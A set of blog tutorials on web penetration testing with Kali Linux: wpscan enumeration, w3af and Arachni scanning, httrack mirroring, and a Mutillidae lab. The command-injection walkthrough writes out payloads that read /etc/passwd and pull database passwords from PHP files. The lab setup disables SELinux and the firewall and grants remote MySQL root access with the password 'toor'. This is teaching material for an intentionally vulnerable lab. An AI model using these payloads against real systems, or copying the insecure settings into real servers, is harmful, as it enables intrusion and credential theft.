wpscan Kali Linux Tutorial to Know WordPress Vulnerabilities

April 25, 2019April 25, 2019 by Vijay Kumar

Millions of Websites are running on WordPress CMS today, Is your website one of them? If Yes, Do you know about vulnerabilities exist on your website?

Think Again!! Is your WordPress website is hackable?

Check Again! Your WordPress website for vulnerabilities.

Today’s topic is wpscan Kali Linux Tutorial to Scan WordPress Website for Known Vulnerability. Yes, we are going to find out vulnerable WordPress core files, Plugins, and themes.

Wpscan a small tool written in ruby and preinstalled in Kali Linux, if you are using another Linux distribution, then install wpscan first.
I was checking my client’s website without any potential purpose, suddenly one question arises in my mind lets check the security. I had installed Kali Linux on a VirtualBox So I had started wpscan to scan the website for getting details about plugin and themes.

Trust me I found lots off aggressive detection, for example, open files, files access directly in browser, usernames and more.

Wpscan Kali Linux Tutorial

Wpscan is used to scan the wordpress website for known vulnerabilities within WordPress core files, plugin, and themes. you can enumerate users for a weak password, users and security misconfiguration.

I am going to tell you all the steps on how to use wpscan in Kali Linux.

In Kali Linux just open terminal and write following syntax to run wpscan

#wpscan

One of the following options is required: URL, update, help, hh, version, or use –help option.

So I used following command to check for available options in wpscan,

#wpscan –help

For Check the version

#wpscan –version

Next step to update wpscan, The database used by wpscan is wpvulndb.com maintains by the team and ever-growing list of vulnerabilities.

#wpscan –update

Scan complete website by giving url followed by –url option

#wpscan –url https://www.yourwebsite.com

If you want to scan website for checking vulnerable Plugin add the –enumerate vp argument

#wpscan –url https://www.yourwebsite.com –enumerate vp

Check the result carefully and you will find lots of information about plugins, if any vulnerable plugin exists, you will see red exclamation icon and relate information.

Do you find any vulnerable plugin?

If Yes.
Update the plugin as soon as possible, if you cannot update, plugins should be replaced or removed permanently.

Scan vulnerable Themes

Similar as plugin scan you need to add –enumerate vt argument to check your website for vulnerable themes.

#wpscan –url https://www.yourwebsite.com –enumerate vt

If you get results with red exclamation icons, it means your theme is vulnerable. You will find url and more information.

Do you have a vulnerable theme?
YES
Update / Replace /Remove whatever you can.

WordPress User Enumeration by Wpscan

A small question for you:
“What if hackers know your WordPress website’s username?”
Will he hack your website?
What impact on your website?

Reply in the comment box.

By the way, it is easy to getting username list and their permissions by using a simple argument –enumerate u

#wpscan –url https://www.yourwebsite.com –enumerate u

If you are using Website firewall you will get error and wpscan will stop.

Brute Force Attack on WordPress website by using Wpscan

Password guessing in old technique to get the right password, and very hard if you are doing manually.

It is easy!

If you are using tool and a word-list.

At the end of tutorial, I am going to say a single phrase.
Don’t use your knowledge unethically.

If you have any questions tell me in the comment box.

Cheers!

Free Website Vulnerability Scanner – W3af in Kali Linux

April 30, 2019January 27, 2017 by Vijay Kumar

W3af- Free Website Vulnerability Scanner

If you are looking for free website vulnerability scanner and assessment tools , w3af is one of them. it is used to scan website for security auditing. it is a open souce web vulnerability scanner. It is used to scan application security services and find out web server vulnerabilities.

w3af is an alternate lightweight escalated web vulnerability scanner brought to the security group from the fine programmers of OWASP web application security . Reporting is limited furthermore not as lovely as Arachni, however will give a decent basis to vulnerability reporting. The enormous playing point, or downfall depending upon how a pentester is captivated on a project, is that w3af has a plenty of adjustable vulnerability plugins that oblige redesigns from the Internet at the time the plugin is launched. Throughout a pentest occasion, if the analyzer does not have internet get to then w3af will create numerous failures. In the event that an Internet association is accessible, then the plugins will downloaded scripts and vulnerability checks, verifying that the output is as forward as could be allowed.

How to use w3af Website Vulnerability Scanner in Kali Linux :

w3af comes by default in kali Linux, and can be accessed by following location.

Click on Applications > Kali Linux > Web Applications > web Vulnerability Scanner > w3af

At the point when the w3af GUI opens, a vacant profile is loaded with no active plugins. Another profile could be made by first selecting the desired plugins then clicking on the Profiles -“Save as” choices from the menu bar. Some prepopulated profiles as of now exist and are accessible to utilize. Clicking on a profile, for example, “Owasp_top10” will select the profile to use for a scan. W3af has been intended for granular control over the plugins. Regardless of the fact that a preconfigured profile is chosen, conformity to the plugins might be made before starting scan. Without Internet access, executing outputs could be a trial by blunder occasion. Underneath the plugins determination window is an alternate situated of plugins. The plugins beneath are for reporting. All reporting is created in the/root/ envelope.

For this guide, the Owasp_top10 profile was chosen; on the other hand, the finding plugins have been turned off for now. HTML reporting is activated

Enter a target site. For this situation, the Metasploitable2 virtual machine was selected. Click the Start button.

The consequences of the scan above are restricted because of the absence of plugins activated. To view the results in the HTML design that was select. Open Iceweasel and explore to: record://root/results.html.

As you have seen W3af website vulnerability scanner linux comes with kali linux and used to find out web application vulnerability.

How to use Arachni scanner for Web Application vulnerability in Kali Linux

April 30, 2019January 26, 2017 by Vijay Kumar

This article about Arachni scanner free and best website vulnerability scanner now days, after this you can go for web application security best practice by Kali Linux or another linux distro. You will be able to learn about Web application vulnerability assessment and web app penetration testing.

Testing Web Application security by Arachni Scanner

The Arachni scanner is an escalated tool that runs from a web interface much likened to that of Tenable’s Nessus. Notwithstanding, dissimilar to Nessus, Arachni can just perform a scan against one host on one port at a time. On the off chance that there are different web services running on a host and not serviced from the port, then repeated scan will must be launch separately. For example, http://www.xyz-company.com/ is facilitating a web application security services on port 80 and phpmyadmin on port 443 (HTTPS), the Arachni scanner will must be run twice. It’s not a blaze and overlook kind of system. Arachni likewise has an exceptionally configurable structure. The plugins and settings for Arachni take into account accuracy checking, and all plugins are enabled by default. Reporting is a snap and could be designed in numerous diverse sorts of output.

Installing Arachni Scanner for Website vulnerability:

Arachni Web Application scanner is not exist in Kali Linux by default, A security analyzer have to install in Kali Linux by using apt-get commands. It will be installed on the Kali Linux system by using following command:

#apt-get install arachni

“Note: Repository should be configured in Kali Linux system”

Add Kali Linux repository

Accessing the Arachni Web Application Security Scanner:

Click on Application > Kali inux > Web Applications > Web Vulnerability Scanners > arachnid_web

The terminal window launched shows that the web service for Arachni has been begun. Open Iceweasel and explore to http:// 127.0.0.1:9292 (according to machine configuration) to get to the web User Interface.

To launch a scan against the Metasploitable2 virtual machine, enter http://192.168.56.115 (IP Address of Metasploitable2 machine) into the URL content box and click on the Launch Scan button. While the scanner is running, the procedure is joined to a dispatch process. Multiple dispatchers can run in the meantime. On the off chance that there are more web services to test against, do a reversal to the Start a Scan tab and launch an alternate scan. On the off chance that Iceweasel closes or multiple scans are running together. Open the web program and explore to Arachni, then click on the Dispatchers tab to associate with each one procedure.

At the point when the scan is finished, Arachni will automatically switch over to the Reports tab. From here a pentester can yield the report into a few diverse formats. Similarly as with the scanners, Arachni likewise continues reporting separate for each dispatcher that was run.

The reports do give bar and pie charts with the output comes about as appeared

Arachni breaks down the report into two subcategories. The main is named “Trusted,” while the second is marked “Untrusted.” Vulnerabilities that are recorded as trusted are considered as precise (or positive) discoveries in light of the fact that the scanner did not get any unusual reactions from the web server at the time of checking. Vulnerabilities that are documented as untrusted are considered to be conceivable false-positives and need to be checked by the analyzer.

Inject SQL Injection Script by using Firebug | SQLi Part1

April 30, 2019October 3, 2014 by Vijay Kumar

Inject SQL Injection Script by using Firebug | SQLi Part1

• SQL injection is a method often used to attack data based applications such as website.
• This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application’s software.
• The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Video:

How to use httrack website copier command line

May 4, 2019October 2, 2014 by Vijay Kumar

Hacker are looking for the vulnerability on website but some they find and some time not, But in other hand security researcher are using techniques to catch hackers red handed on crime place. So hackers copy the website first on local computer and start looking on code and try to find vulnerability. In this techniques they use tool name httrack. In this tutorial I will describe how to use httrack website copier.

How to use httrack website copier tool download

HTTrack is a free (GPL, libre/free software) and easy-to-use offline browser utility.
This is a tool download website for offline on your computer’s local directory, for testing purpose. It copy web page one by one on local directory.

If you are thinking to test a website for security purpose, it is recommended to download website on your local server. Setup a local web server and start accessing website like a real server. Now your local server has been created use it for finding vulnerabilities on website. better luck!

Here one more thing I want to share with you that Httrack doesn’t come with Kali Linux. if you are Kali Linux user then it is a problem, but not big. Httrack’s Linux available to download and install, So you can make available on Kali Linux easily.

Install Httrack on Kali Linux

I think you are aware with Advance package tool (APT), it is used to install, remove, reinstall of packages on Debian based Operating system like Kali Linux and Ubuntu. So here I am using apt-get to install httrack. before start installation we should update apt in Kali Linux for new headers. Execute following command:

#apt-get update

#apt-get install httrack

Start a Project to download website

You have download httrack, Now it’s time for new project. Here i am going to download my own website https://www.cyberpratibha.com/blog/blog So first create a directory with project name.

#mkdir cyberpedia

How to use httrack website copier – step by step guide

Use following command in terminal.

#httrack
Enter Project Name: cyberpratibha.com/blog
Enter base path : where do you want to download website
Enter URL: Website Url
Select option and start mirroring website:

Video tutorial for how to use httrack website copier

How to use httrack website copier graphically

April 30, 2019October 2, 2014 by Vijay Kumar

How to use httrack website copier graphically

Httrack is a free (GPL, libre/free programming) and simple to-utilize off-line browser utility.
It permits you to download a World Wide Web website from the Internet to your local computer assembling recursively all derectories, getting HTML, pictures, and different records from the server to your local machine. Httrack is completely configurable, and has an incorporated help framework.
In kali linux it is not found by default you have to install first and configure HTrack.
Video:

Mutillidae Part 2: Command Injection Database Interrogation

April 30, 2019July 10, 2014 by Vijay Kumar

Mutillidae Part 2: Command Injection Database Interrogation

What is Mutillidae?

Mutillidae is a free, open source, Vulnerable Web-application provide a target for Web-Security analyst. It have OWASP-Top10 Vulnerability, and designed by OWASP.
What is command Injection?
Command Injectionis a web-vulnerability that allow attacker to run Operating System commands or Server side scripts from the web interface (Web application). Such type of vulnerability occurs when web application allow users to access any command for example nslookup, whois, ping, traceroute etc through webpage. This vulnerability can tested by fuzzing technique. In fuzzing attacker commonly used a word like “;” or “|” or “||” or “&” or “&&” end of expected input.
For example [expected_Input]; [command]

Pre-Requisite Web Penetration Testing Lab

1. Configured Mutillidae.
How To Setup Virtual Lab For Web Penetration Testing

Remote database access has been turned on.

2. Installed Kali Linux:

In Simple way Kali Linux is not necessary, but if you are penetration Tester you should use Kali Linux Virtual Machine.

Configure the network interface of both machine Fedora-Mutillidae and Kali Linux. Start both machine and check the connectivity between them.
How to install Kali Linux

Step 1: Access Mutillidae by Kali Linux Machine

On the Kali Linux Machine, Open IceWeasel

Application à Internet à IceWeasel Web Browser
In the URL address bar http://Victim_Ip_Address/mutillidae (Victim IP can be obtained by #ifconfig command)
In mine case http://192.168.0.102/mutillidae

Go to DNS Lookup
OWASP Top 10 à A2 – Cross Site Scripting (XSS) à Reflected (First Order) à DNS Lookup

DNS Lookup is designed to do just that by a dnslookup utility in command interface
Hostname /IP: www.cyberpratibha.com/blog
Click on the Lookup DNS button and see your Results.

Test DNS Lookup Vulnerability
To find the command execution vulnerability, just enter the hostname and then command separated by “;”. The procedure “;” after what the software expects, is called fuzzing. Enter following code
www.cyberpratibha.com/blog; uname –a
View you Results

Perform Reconnaissance:

It would be wonder if you get that particular web application is running from. In Linux you would be able to find current working directory by “pwd”. Follow the given instructions:

Enter: Hostname / IP: www.cyberpratibha.com/blog; pwd
Click on the Lookup DNS Button, and view you Results.

Interrogate the dns-lookup.php application

The codes are filled by attacker is excuted by dns-lookup.php. Let’s see if we are able to find the line code where PHP is exciting a system call. Follow instructions

hostname; find /var/www/html/mutillidae -name “dns-lookup.php” | xargs egrep ‘(exec|system|virtual)’
Click on Lookup DNS button, Analyze you Results

“nslookup” Linux command is executing by a function called shell_exec(),

Database reconnaissance:
Enter the following syntax

hostname; cat /etc/passwd | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button, View your Results. In the Result MySQL is the database engine.

Discover Database:

By using “ps” command you can discover the Database Engine. It is used to search for the process strings such as pstgresql, sql, db2 and ora.
hostname; ps -eaf | egrep -i ‘(postgres|sql|db2|ora)’

Click on the Lookup DNS button to see the mysqld is running or not in the Result.

Database Interrogation:

In this step we will figure out if any php scripts contain a database name and password under /var/www/html/mutillidae. Fill the given syntax into the text box and click on the Lookup DNS button

hostname; find /var/www/html/mutillidae -name “*.php”

This command will display list of all php scritps into the /var/www/html/mutillidae folder. There is more then 900 scripts.

Find the password in php scripts:

We will search all php scripts for the string “password” and ”=” command will be similar following
hostname; find /var/www/html/mutillidae -name “*.php” | xargs grep -i “password” | grep “=”

Obtain Password from the Results:

See the string password, it is in actual

$mMySQLDatabasePassword = “toor”;

Search for user OR Login in the MySQLHandler.php

As We know the Database passwords are inside the MySQLHandler.php. following code is used for obtain the user or Login
hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs egrep -i ‘(user|login)’ | grep “=”

Display MySQLHandler.php
I figure I could have demonstrated to you this to start with, however great things go to those that hold up.

It is possible to show the substance of the MySQLHandler.php program, by encoding the “<?php” and “?>” labels. These tags advise apache to execute a php script. To get around this issue and simply show the content of the project, we change “<” to “<” and “>” to “>”.

hostname; find /var/www/html/mutillidae -name “MySQLHandler.php” | xargs cat | sed ‘s/</\</g’ | sed ‘s/>/\>/g’

Click on the Lookup DNS Button, and view the result.

How To Create a Virtual Lab For Web Penetration Testing

April 30, 2019July 4, 2014 by Vijay Kumar

How to install Mutillidae on Fedora 20

What is Mutillidae?

OWASP Mutillidae project is a free, open source, deliberately vulnerable web-application giving a focus to web-security lover.

With many vulns and clues to help the client; this is a simple to-utilize web hacking environment intended for labs, security devotee, classrooms, CTF, and weakness appraisal apparatus targets. Mutillidae has been utilized within graduate security courses, corporate web sec instructional classes, and as a “survey the assessor” focus for defenselessness evaluation programming.

Pre-Requisite

Installed Fedora on VirtualBox
How to install Fedoar on VirtualBpX Click Here

Downloaded Latest version of mutillidae
http://sourceforge.net/projects/mutillidae/

Step 1: Configure Fedora 20 Virtual Machine Settings

Open VirtualBox
Start your Host Computer, Go to
Start à All Program à Oracle VM VirtualBox à Oracle VM VirtualBox
OR
Click the Start Button
Type “VirtualBox” in the search Box
Click On Oracle VM VirtualBox
Edit Fedora Virtual Machine Settings

Select Fedora Virtual Machine
Click on the Setting button, exist left top corner of VirtualBox
Edit Network Adapter: Highlight Network in left menu option, Then configure network Attached to: NAT

Step 2: Configure Fedora for Mutillidae

Hilight Fedora Virtual Machine then click on “Start” icon on the top left corner of VirtualBox
Login to Fedora

Username: Victim Fedora
Password: <Whatever you Set>
Open terminal and switch to “root” root by using following command
$su
<password what ever you set for “root” user>
Open Console Terminal and Check the connectivity with internet by using following command:
#ping www.google.com

Step 3: Disable SELinux

Open the SELinux configuration file with any text editor software in Linux
#gedit /etc/selinux/config 2> /dev/null &
gedit: is a text editor for the GNOME Desktop.
/etc/selinux/config, is the file name.
2> /dev/null, sends standard error messages to a black hole (/dev/null)
The “&” is used to run gedit in the background
Delete enforcing.

Take cursor down to SELINUX=enforcing inside the /etc/selinux/config file
Delete the enforcing word.
Replace “enforcing” with the word “disabled”
Click the save file
Next two commands are required to disabled SELinux properly
#setenforce 0
#sestatus
Disable the Firewall

#service iptables stop
#chkconfig iptables off (is used to disable firewall permanently)

Step 4: Install Required packages

Install Apache httpd Server
Apache is a Web server used to make computer work as Web Server It can installed in Fedora by using following commands
#yum install httpd.i686
“y”(It will ask later for use confirmation)
Start Apache Server
Apache listening Daemon can be started by using following command:
#service httpd start
Check the status Apache is running or not
#ps –eaf | grep httpd
#chkconfig –level 2345 httpd on
These command is used to start up script of httpd for given run levels 2, 3, 4, and 5.
Install mysql and mysql-server
#yum install mysql.i686

Is this okay [y/N]: y and hit enter to proceed
#yum install mysql-server

Is this okay [y/N]: y and hit enter to proceed
#service mysqld start

Service mysqld can be made to run at every startup then, it is created a startup script for run level 2, 3, 4, and 5. Setup the password for mysql “root” user password to “toor” by using given commands
#mysqladmin –uroot password toor

Login to mysql
#mysql –uroot –p (Enter)
Enter the password: toor
>show databases;
>quit

Allow Remote Access to MySQL
Remote access is not part of Mutillidae installation. Remote Access can be allowed by using following commad.
#echo “use mysql; GRANT ALL PRIVILEGES ON * .* TO ‘root’@’%’ IDENTIFIED BY ‘toor’ WITH GRAN OPTION;” | mysql –uroot -ptoor

Install PHP
Install PHP:
#yum install php.i686
Is this okay [y/N]: y and hit enter to proceed

install php-mysql:
#yum install php-mysql
Is this okay [y/N]: y and hit enter to proceed

Install php-pear
#yum install php-pear php-pear-DB
Is this okay [y/N]: y and hit enter to proceed

Install php-mbstring
#yum install php-mbstring
Is this okay [y/N]: y and hit enter to proceed

Open & Edit php.ini
#gedit /etc/php.ini 2> /dev/null &
gedit is a text editor for Linux platform “/etc/php.ini” is php configuration file. The “&” is used to open gedit in the background
Search à Find..
Search for: ; extension
Click to find button
In the next line of ‘; extension_dir = “./”’ add the following code
extension=mysql.so
Save and close the file.Restart Apache :
#service httpd restart
Install wget :
#yum install wget
Is this okay [y/N]: y
Install Mutillidae
Download the Unzip file of Mutillidae project for Web penetration testing
Copy in /var/www/html
unzip LATEST-mutillidae-<latest Version>

Open & Edit MySQLHandler.php
#cd mutillidae/classes/
#ls –lrta
# gedit MySQLHandler.php 2> /dev/null &
The MySQLHandler.php is the file of mutillidae database configuration file. Arrow down at the line “$mMySQLDatabasePassword = “” and set the password as “toor”. Save and close the file

Change the ownership:
Go inside the location /var/www/html
#chown apache:mysql mutillidae
#chmod 770 mutillidae
#ls –ld mutillidae

Start the Firefox
And enter http://loacalhost/mutillidae in Address bar.

Click on setup/reset the Database
Setting up the database
Click Ok button
Welcome to Mutillidae ………